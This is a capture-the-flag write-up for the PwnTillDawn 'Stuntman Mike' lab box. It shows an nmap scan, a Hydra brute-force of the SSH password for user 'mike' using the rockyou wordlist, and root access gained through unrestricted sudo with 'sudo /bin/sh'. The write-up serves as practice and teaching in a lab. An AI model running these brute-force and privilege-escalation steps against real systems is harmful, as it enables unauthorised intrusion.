This will be a write up on a PwnTillDawn Online Battlefield box — Stuntman Mike. Please check out the following links to find out more on PwnTIllDawn Online Battlefield.
Nmap Scan
kali@kali:~$ sudo nmap -sC -sV -O 10.150.150.166Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 01:31 ESTNmap scan report for 10.150.150.166Host is up (0.20s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 (protocol 2.0)| ssh-hostkey:| 2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)| 256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)|_ 256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)8089/tcp open ssl/http Splunkd httpd| http-robots.txt: 1 disallowed entry|_/|_http-server-header: Splunkd|_http-title: splunkd| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser| Not valid before: 2019-10-25T09:15:13|_Not valid after: 2022-10-24T09:15:13No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=11/22%OT=22%CT=1%CU=39741%PV=Y%DS=2%DC=I%G=Y%TM=5FBA05OS:EC%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPSOS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECNOS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AOS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(ROS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%FOS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CDOS:=S)Network Distance: 2 hopsOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 67.67 seconds
Let’s look into port 22.
You could use metasploit to enumerate the ssh username.
Just connecting to the IP through SSH reveals the username and the flag.
I was stuck at trying to bruteforce the username “stuntman mike” for hours…
My mind wasn't thinking straight and in the end, I decided to try using the username mike instead, as I never really seen ssh names with spaces.
I use Hydra to bruteforce the ssh user mike and very quickly I got the password.
$ hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166 -V -f
Now lets SSH using the username mike.
You should be able to easily get the next flag which is the user’s flag using the command ls.
Now, to get the root flag we will need to escalate our current privilege.
Using the command:
$ sudo -lThis command will allow us to list what commands we can run with root privileges.
From above we can see that we are able to run all commands with root privileges.
Using the command $ sudo /bin/sh , we should be able to easily get a root shell, meaning a shell with root privileges.
bin/sh is basically just an executable file, just like when you use ls, pwd, etc. These commands also have the respective executable file to do what they are supposed to do, for example, ls is to list the directory files.
sh itself executes commands from the command line string (read more here).
So when you use the command sudo /bin/sh it allows us to use a shell that has root privileges.
You should be able to get the root flag easily. Usually, for simple ctf challenges like this, the root flag is located in the root directory.
